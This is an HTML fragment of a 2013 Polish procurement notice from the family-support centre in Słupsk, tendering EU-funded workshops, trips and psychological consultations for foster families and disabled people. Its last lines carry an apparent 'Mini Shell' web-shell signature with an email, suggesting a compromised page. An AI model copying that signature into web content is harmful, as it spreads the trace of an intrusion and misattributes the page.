<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
1)	w uzasadnionych przypadkach za zgodą Zamawiającego możliwa jest zmiana terminów realizacji zamówienia,
2)	harmonogram i program stanowiące załączniki do umowy mogą podlegać modyfikacji w uzasadnionych przypadkach za porozumieniem obu stron, przy czym zmiany te mogą nastąpić na wniosek Wykonawcy wyłącznie na trzy dni przed terminem spotkania wynikającego z harmonogramu,
3)	osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu określonych w SIWZ, przy czym zmiany te mogą nastąpić na wniosek Wykonawcy wyłącznie na trzy dni przed terminem spotkania wynikającego z harmonogramu,
4)	zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy.
4.	Zamawiający zastrzega sobie prawo do unieważnienia postępowania, jeżeli środki pochodzące z budżetu Unii Europejskiej nie zostaną mu przyznane.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pcpr.slupsk.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Słupsku, 
Al. Sienkiewicza 20, 
76-200 Słupsk, woj. pomorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Słupsku, 
Al. Sienkiewicza 20, 
76-200 Słupsk, woj. pomorskie 
pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn. Wyższe kwalifikacje zawodowe - większe możliwości na rynku pracy, jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji. Poddziałanie 7.1.2. Rozwój i upowszechnienie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztat kompetencji społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: Warsztat jest skierowany do 12 wychowanków rodzin zastępczych w wieku 15 - 25 lat.
2.	Celem warsztatu jest wzrost kompetencji społecznych uczestników, tj. nabycie umiejętności zachowania asertywnego, poprawa komunikacji interpersonalnej i zweryfikowanie u uczestników wiedzy na temat roli kobiety i mężczyzny w rodzinie, stereotypów dotyczących płci oraz możliwości rozwiązywania konfliktów rodzinnych oraz integracja uczestników.
3.	Zakres tematyczny: trening integracyjny, asertywność, komunikacja interpersonalna, rola kobiety i mężczyzny w rodzinie. Zamówienie realizowane będzie w jednej grupie 12- osobowej w łącznej w ilości 12 godzin dydaktycznych (4 spotkania po 3 godziny dydaktyczne), w tym 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: dyskusja, ćwiczenia, gry, itp. 
4.	Termin realizacji części I - do 31 marca 2013 r. spotkania będą odbywały się w dni robocze od poniedziałku do piątku w godzinach popołudniowych, 4 spotkania po 3 godziny dydaktyczne (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
5.	Miejsce realizacji zamówienia:  siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20. Zamawiający zapewnienia salę szkoleniową, materiały piśmiennicze dla uczestników/czek, poczęstunek dla uczestników/czek projektu, zwrot kosztów dojazdu uczestnikom/czkom na zajęcia. Inne materiały papiernicze i piśmiennicze niezbędne do realizacji warsztatu mogą zostać zapewnione przez Zamawiającego tylko i wyłącznie po wcześniejszym zgłoszeniu tego przez Wykonawcę (wykaz materiałów papierniczych i piśmienniczych musi zostać zaakceptowany przez zamawiającego).
6.	Wykonawca zobowiązany jest do:
1)	przeprowadzenia warsztatu zgodnie z umową,
2)	zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
3)	zapewnienia niezbędnych akcesoriów do przeprowadzenia zajęć,
4)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
5)	przygotowania konspektów zajęć warsztatowych, prowadzenia dziennika zajęć wraz z listą obecności, pokwitowania odbioru materiałów szkoleniowych,
6)	przygotowania i przeprowadzenia z uczestnikami  ankiet początkowych (w pierwszym dniu zajęć) i ankiet końcowych (w ostatnim dniu zajęć) badających kompetencje społeczne uczestników (w tym z zakresu asertywności, komunikacji interpersonalnej, wiedzy nt. roli kobiety i mężczyzny w rodzinie, stereotypów dotyczących płci, rozwiązywania problemów) oraz sporządzenia analizy tych ankiet,
7)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> warsztat integracyjno- animacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: Warsztat skierowany jest do 16 rodziców zastępczych oraz ich wychowanków.
2.	Cel warsztatu: budowanie właściwych relacji pomiędzy rodzicami zastępczymi a wychowankami, poprawa relacji  rodziców/opiekunów z dziećmi,  przełamanie między nimi barier, pogłębienie więzi emocjonalnych, budowa wzajemnego zaufania, poprawa komunikacji, nauka organizacji i zarządzania czasem, możliwość stworzenia odpowiednich warunków do wymiany doświadczeń między rodzicami zastępczymi. 
3.	Zakres tematyczny: integracja, komunikacja w rodzinie, sposoby nawiązywania kontaktów w rodzinie poprzez grę i animację. Zamówienie realizowane będzie w jednej grupie 16 rodziców zastępczych i ich wychowanków w formie wyjazdowej do Sierakowa Sławieńskiego - Wioska Hobbitów na jeden dzień, gdzie przeprowadzone zostaną warsztaty integracyjno - animacyjne, tj. gry i zabawy animacyjne, w tym zajęcia zabawy z chustą Klanzy. zabawy z animatorami, gra terenowa. Przewiduje się, iż udział w wyjeździe weźmie nie więcej niż 50 osób, jednak dokładna ilość osób zostanie wskazana na etapie realizacji zamówienia.
4.	Termin realizacji części II - do dnia 30 kwietnia 2013r., realizacja zamówienia w ciągu jednego dnia -  sobota,  w terminie od 7 do 30 kwietnia 2013 r., co oznacza, że najszybszy termin wyjazdu planuje się na dzień 7 kwietnia 2013r. (dokładny termin warsztatu ustalony zostanie z Wykonawcą na etapie podpisywania umowy). 
5.	Czas pobytu w Wiosce Hobbitów w Sierakowie Sławieńskim - od godziny 10.00 do godziny 16.00, w tym 6 godzin dydaktycznych zajęć integracyjno - animacyjnych, dwie przerwy 15 - minutowe i jedna przerwa obiadowa.
6.	Miejsce realizacji zamówienia: Sierakowo Sławieńskie Wioska Hobbitów (poniesienie kosztów związanych z dojazdem wszystkich uczestników warsztatu do Sierakowa Sławieńskiego oraz kosztów wyżywienia uczestników warsztatu leży po stronie Zamawiającego). 
7.	Wykonawca zobowiązany jest do: 
1)	przeprowadzenia warsztatu zgodnie z umową,
2)	przeprowadzenia warsztatu integracyjno-animacyjnego obejmującego 6 godzin dydaktycznych za pomocą  gier i zabaw animacyjnych spełniających cele dydaktyczne i wpływających na uzyskanie ww. celów (integracja, przełamanie barier), w tym m.in. zajęcia zabawy z chustą Klanzy, zabawy z animatorami, gra terenowa,
3)	zapewnienia materiałów i akcesoriów niezbędnych do przeprowadzenia ww. warsztatu, 
4)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatu zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wyjazdowy warsztat aktywizacji społecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: Warsztat jest skierowany do 8 osób niepełnosprawnych w wieku aktywności zawodowej.
2.	Celem warsztatu jest wzrost kompetencji życiowych i umiejętności społecznych poprzez: stworzenie warunków do usamodzielnienia się osób niepełnosprawnych, wzrost ich umiejętności poruszania się poza środowiskiem naturalnym, integrację grupy w celu przełamania barier i poprawy komunikacji, naukę organizacji i zarządzania czasem. 
3.	Zakres tematyczny: edukacja psychospołeczna prowadzona za pomocą technik dramowych, integracja, przełamanie barier, poprawa komunikacji, nauka organizacji i zarządzania czasem. Zamówienie realizowane będzie w łącznej ilości 12 godzin dydaktycznych  (3 dni: piątek, sobota, niedziela), z czego 80% czasu trwania warsztatu przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj. ćwiczeń twórczych, scenek rodzajowych, gier.
4.	Termin realizacji części III- do 31 marca 2013 r., zajęcia będą odbywały się podczas 1 wyjazdu weekendowego, w dniach: piątek, sobota, niedziela w następującym podziale czasowym: piątek- 3 godz. dydaktyczne w godz. od 15:30 do 18:00, w tym jedna przerwa 15 minutowa,  sobota- 6 godz. dydaktycznych w godz. od 10:00- 17:00, w tym dwie przerwy 15- minutowe i jedna 2-godzinna obiadowa,  niedziela- 3 godziny dydaktyczne, w tym jedna przerwa 15 minutowa.   (w godzinach od 10:00 do12:30).
5.	Miejsce realizacji zamówienia: Ośrodek wczasowy na terenie powiatu słupskiego (zapewnienie sali dydaktycznej, noclegu dla uczestników, wyżywienia i poczęstunku dla uczestników oraz poniesienie kosztów związanych z dojazdem uczestników do miejsca realizacji warsztatu leży po stronie Zamawiającego). Inne materiały papiernicze i piśmiennicze niezbędne do realizacji warsztatu mogą zostać zapewnione przez Zamawiającego tylko i wyłącznie po wcześniejszym zgłoszeniu tego przez Wykonawcę(wykaz materiałów papierniczych i piśmienniczych musi zostać zaakceptowany przez zamawiającego).
6.	Wykonawca zobowiązany jest do: 
1)	przeprowadzenia warsztatu zgodnie z umową,
2)	zapewnienia materiałów szkoleniowych dla 8 uczestników projektu oraz jeden dodatkowy do dokumentacji projektowej,
3)	zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
4)	przygotowania konspektów zajęć warsztatowych, prowadzenia dziennika zajęć wraz z listą obecności, pokwitowania odbioru materiałów szkoleniowych,
5)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
6)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> warsztat Szkoła rodzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: Warsztat skierowany jest do 16 rodziców zastępczych oraz ich wychowanków (przewiduje się, iż udział w warsztacie weźmie nie więcej niż 50 osób, jednak dokładna ilość osób zostanie wskazana na etapie realizacji zamówienia
2.	Zamówienie realizowane będzie w dwóch etapach:
1)	I etap - część teoretyczna w ilości 15 godzin dydaktycznych (5 spotkań po 3 godz. Dydaktyczne).
termin realizacji I etapu szkoły rodzica: do 31 marca 2013r.- spotkania będą odbywały się w dni robocze od poniedziałku do piątku w godzinach od. 16:00 do godz. 18.30 (w tym jedna przerwa 15-minutowa) - dokładny terminarz zajęć ustalony zostanie z Wykonawcą na etapie podpisywania umowy
2)	 II etap - 2-dniowy warsztat wyjazdowy w ilości 12 godzin dydaktycznych (zajęcia praktyczne), 
termin realizacji II etapu szkoły rodzica: do 30 kwietnia 2013r. - II etap zrealizowany w formie wyjazdu weekendowego (sobota - niedziela) w okresie od 01 kwietnia 2013 r. do 30 kwietnia 2013r. (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).

3.	Etap I szkoły rodzica: zajęcia teoretyczne
1)	Celem warsztatów jest wzrost kompetencji społecznych i wychowawczych uczestników, tj. poprawa komunikacji w rodzinie, nawiązanie głębszych relacji z dziećmi, nabycie umiejętności radzenia sobie ze stresem, uświadomienie uczestnikom istoty współpracy z rodziną biologiczną dziecka oraz właściwej roli kobiety i mężczyzny w rodzinie, rozwiązywania konfliktów rodzinnych i pokonywania trudności w sytuacjach kryzysowych, przekazywanie prawidłowych wzorców wychowawczych na dzieci i zasad dobrego wychowania z elementami savoir vivre.
2)	Zakres tematyczny: treningu z komunikacji w rodzinie,  metody radzenia sobie ze stresem, kryzysami w rodzinie, rozwiązywanie konfliktów w rodzinie, sposoby nawiązywania głębszych relacji z dziećmi, prawidłowe wzorce wychowawcze, zasady dobrego wychowania z elementami savoir vivre. Zamówienie realizowane będzie w łącznej ilości 15 godzin lekcyjnych (5 dni po 3 godz. lekcyjne), z czego min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry, dyskusja itp.
3)	Miejsce realizacji etapu I szkoły rodzica: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, poczęstunku dla uczestników/czek oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego). Inne materiały papiernicze i piśmiennicze niezbędne do realizacji warsztatu mogą zostać zapewnione przez Zamawiającego tylko i wyłącznie po wcześniejszym zgłoszeniu tego przez Wykonawcę.
4)	Wykonawca zobowiązany jest do: 
a)	przeprowadzenia warsztatu zgodnie z umową,
b)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy  Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
c)	zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
d)	zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć, 
e)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
4.	Etap II szkoły rodzica: zajęcia praktyczne 
1)	Celem wyjazdu jest wzrost kompetencji społecznych i wychowawczych uczestników projektu poprzez wykorzystanie w ramach zajęć praktycznych wiedzy teoretycznej zdobytej w ramach I etapu warsztatu Szkoła rodzica. Celem II etapu jest wzmocnienie poczucia odpowiedzialności rodziców za sytuację życiową dzieci, zmiany stylu wychowania, zwrócenie uwagi na potrzeby i umiejętności dzieci poprzez trening umiejętności opiekuńczo-wychowawczych i społecznych poza miejscem zamieszkania w celu pogłębienia i ocieplenia relacji pomiędzy rodzicami zastępczymi i ich wychowankami.
2)	Zakres tematyczny: 100% zajęć warsztatowych prowadzonych na zasadzie praktycznego treningu umiejętności opiekuńczo- wychowawczych i społecznych, wzmocnienia więzi pomiędzy rodzicami i wychowankami w wyniku przeprowadzonych różnego rodzaju gier, zabaw, aktywnych metod pracy z grupą.
3)	Miejsce realizacji zamówienia: Ośrodek wczasowy na terenie powiatu słupskiego (Zamawiający zapewni uczestnikom projektu i wychowankom transport do miejsca realizacji zamówienia a następnie do miejsca zamieszkania, wyżywienie, nocleg i poczęstunek).
4)	Wykonawca zobowiązany jest do:
a)	przeprowadzenia warsztatu zgodnie z umową,
b)	zapewnienia innych materiałów piśmienniczych i  papierniczych niezbędnych  do przeprowadzenia zajęć, w przypadku gdy  Wykonawca z wyprzedzeniem nie zgłosi takiej potrzeby Zamawiającemu,
c)	zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
d)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> indywidualne konsultacje psychologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Grupa docelowa: Indywidualnymi konsultacjami psychologicznymi objętych zostanie 30 rodziców zastępczych (zakłada się, że w przypadku pojawiającej się potrzeby ze strony rodziców zastępczych w konsultacjach udział mogą wziąć członkowie rodzin zastępczych).
2.	Cel konsultacji: systematyczne wsparcie w prawidłowym oddziaływaniu na wychowanków rodzin zastępczych, rozwiązywanie bieżących problemów.
3.	Zamówienie realizowane będzie w formie indywidualnych porad psychologicznych w łącznej ilości 180 godzin, tj. średnio 6 godz./ 1 rodzica zastępczego, wykorzystywanych przez rodziców zastępczych w zależności od ich indywidualnych potrzeb.
4.	Termin realizacji części V - od 1 marca do 30 listopada 2013 r. w godzinach i terminach indywidualnie dostosowywanych do potrzeb uczestników projektu, przy czym zakłada się, że konsultacje odbywać się będą systematycznie, tj. średnio 20 godzin w miesiącu.
5.	Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej oraz poniesienie kosztów związanych z dojazdem uczestników na indywidualne poradnictwo leży po stronie Zamawiającego).
6.	 Wykonawca zobowiązany jest do:
a)	przeprowadzenia indywidualnych porad psychologicznych w terminach uzgadnianych na bieżąco w trakcie trwania umowy z wyprzedzeniem co najmniej tygodniowym,
b)	prowadzenia dokumentacji przebiegu konsultacji indywidualne karty konsultacji,
c)	zapewnienia uczestnikom/czkom niezbędnych materiałów szkoleniowych (w tym 1 egzemplarz materiałów szkoleniowych do dokumentacji projektowej),
d)	sporządzenia indywidualnych opinii psychologicznych dotyczących kompetencji wychowawczych, kompetencji społecznych;
e)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com